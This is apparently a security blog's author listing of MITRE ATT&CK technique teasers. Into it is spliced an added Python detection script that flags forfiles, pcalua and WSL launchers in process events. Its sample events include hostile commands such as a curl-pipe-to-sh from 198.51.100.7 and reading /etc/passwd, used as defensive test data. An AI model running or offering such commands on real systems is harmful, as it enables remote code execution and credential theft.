Indirect Command Execution: Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without ever invoking cmd.exe, so controls that only watch or block the interpreter itself miss the launch. For example, Forfiles, the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), as well as other utilities may invoke the execution of programs and commands from a Command and Scripting Interpreter, Run window, or via ... Read More
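Because the interpreter may never appear in the telemetry, the practical check is on the launcher's own command line: each of the utilities named above takes a switch that carries the program it will run. The following is an added detection example (not code from the original post or from GuardSight) that walks constructed process-creation events, matches the launcher binary and extracts the indirectly executed command. The event field names (image, command_line, parent_image) and the sample events are assumptions for illustration.

```python
"""Flag process-creation events where a Windows utility launches another
program indirectly (forfiles, pcalua, WSL) instead of cmd.exe doing so."""
import ntpath
import re

# Launcher binary -> regex whose capture group is the program/command it executes.
# Switches: forfiles /c "<command>", pcalua -a <program>, wsl -e|--exec|-c <cmd>,
# bash -c "<cmd>" (the WSL bash launcher).
LAUNCHER_RULES = {
    "forfiles.exe": re.compile(r'(?i)/c\s+"?([^"]+)'),
    "pcalua.exe":   re.compile(r'(?i)-a\s+"?([^"\s]+)'),
    "wsl.exe":      re.compile(r'(?i)(?:-e|--exec|-c)\s+(.+)'),
    "bash.exe":     re.compile(r'(?i)-c\s+"?(.+?)"?\s*$'),
}


def detect_indirect_execution(events):
    """Return one finding per event in which a known launcher carries an
    execution switch. Events are dicts with image, command_line, parent_image."""
    findings = []
    for ev in events:
        image = ntpath.basename(ev.get("image", "")).lower()
        rule = LAUNCHER_RULES.get(image)
        if rule is None:
            continue
        match = rule.search(ev.get("command_line", ""))
        if not match:
            continue  # launcher ran without an execution switch, e.g. "forfiles /?"
        findings.append({
            "launcher": image,
            "parent": ntpath.basename(ev.get("parent_image", "")).lower(),
            "target": match.group(1).strip(),
            "command_line": ev["command_line"],
        })
    return findings


# Constructed sample telemetry (hypothetical; not real captured events).
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\forfiles.exe",
     "command_line": 'forfiles.exe /p C:\\Windows\\System32 /m notepad.exe /c "calc.exe"',
     "parent_image": r"C:\Windows\explorer.exe"},
    {"image": r"C:\Windows\System32\pcalua.exe",
     "command_line": r"pcalua.exe -a C:\Users\Public\payload.exe",
     "parent_image": r"C:\Windows\explorer.exe"},
    {"image": r"C:\Windows\System32\wsl.exe",
     "command_line": 'wsl.exe -e /bin/bash -c "cat /etc/passwd"',
     "parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"image": r"C:\Windows\System32\notepad.exe",          # benign, not a launcher
     "command_line": "notepad.exe report.txt",
     "parent_image": r"C:\Windows\explorer.exe"},
    {"image": r"C:\Windows\System32\forfiles.exe",          # launcher, but no /c
     "command_line": "forfiles.exe /?",
     "parent_image": r"C:\Windows\System32\cmd.exe"},
    {"image": r"C:\Windows\System32\bash.exe",
     "command_line": 'bash.exe -c "curl http://198.51.100.7/x | sh"',
     "parent_image": r"C:\Windows\explorer.exe"},
]


if __name__ == "__main__":
    for f in detect_indirect_execution(SAMPLE_EVENTS):
        print(f"{f['launcher']:<13} parent={f['parent']:<14} target={f['target']}")
```

The match on the launcher name is deliberately done on the image path rather than the command line so that a renamed copy of cmd.exe is not mistaken for one of these utilities; conversely, a renamed forfiles.exe would evade this rule, which is why file-hash or original-filename fields, where the sensor provides them, make a better key than the basename.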
About Katherine Kostreva: This author has not yet filled in any details.
So far Katherine Kostreva has created 37 blog entries.
Credentials from Password Stores: Adversaries may search for common password storage locations to obtain user credentials. Passwords are stored in several places on a system, depending on the operating system or application holding the credentials. There are also specific applications that store passwords to make it easier for users to manage and maintain them. Once credentials are obtained, they can be used to perform lateral movement and access restricted information. Credentials from Password Stores: Credentials from Web ... Read More
Native API: Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes. These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as for carrying out tasks and requests during routine operations. Functionality provided by native APIs is ... Read More
Command and Scripting Interpreter: Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities; for example, macOS and Linux distributions include some flavor of Unix Shell, while Windows installations include the Windows Command Shell and PowerShell. There are also cross-platform interpreters such ... Read More
Compromise Accounts: Adversaries may compromise accounts with services that can be used during targeting. For operations incorporating social engineering, the utilization of an online persona may be important. Rather than creating and cultivating accounts (i.e. Establish Accounts), adversaries may compromise existing accounts. Utilizing an existing persona may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona. A variety of methods exist for compromising accounts, ... Read More
Hijack Execution Flow: Adversaries may execute their own malicious payloads by hijacking the way operating systems run programs. Hijacking execution flow can be for the purposes of persistence, since this hijacked execution may reoccur over time. Adversaries may also use these mechanisms to elevate privileges or evade defenses, such as application control or other restrictions on execution. There are many ways an adversary may hijack the flow of execution, including by manipulating how the operating ... Read More
Active Scanning: Adversaries may execute active reconnaissance scans to gather information that can be used during targeting. Active scans are those where the adversary probes victim infrastructure via network traffic, as opposed to other forms of reconnaissance that do not involve direct interaction. Active Scanning: Scanning IP Blocks: Adversaries may scan victim IP blocks to gather information that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a ... Read More
How To Protect Against Privilege Escalation Attacks: Create strong, unique passwords and change them regularly. This simple action can lower the risk of privilege escalation attacks. If every administrator account has a strong password, attackers will struggle to take control of those accounts by guessing. You can also protect against privilege escalation by monitoring login requests. Attackers may gain access by performing a brute force attack, and a burst of failed logins from one source is what that attack looks like in the logs. Watch login requests. This way, you can see which users are ... Read More
Hello! Welcome back to this next TomCast from GuardSight; we are a tactical cybersecurity-as-a-service organization dedicated to helping businesses protect their data, their assets, and their endpoints. Today’s discussion involves web browsing. Web browsing requires a web browser, which is defined by Oxford as “a computer program with a graphical user interface for displaying and navigating between web pages”. If you have ever heard the term “surfing the web” or navigating the web, ... Read More
Hello! Welcome back to this next TomCast from GuardSight; we are a tactical cybersecurity-as-a-service organization dedicated to helping businesses protect their data, their assets, and their endpoints. Today’s discussion involves soft skills. What are soft skills? Since I am a fan of looking up definitions from Oxford, we’ll remain consistent here. Soft skills are “personal attributes that enable someone to interact effectively and harmoniously with other people”. Why would anyone want to interact ... Read More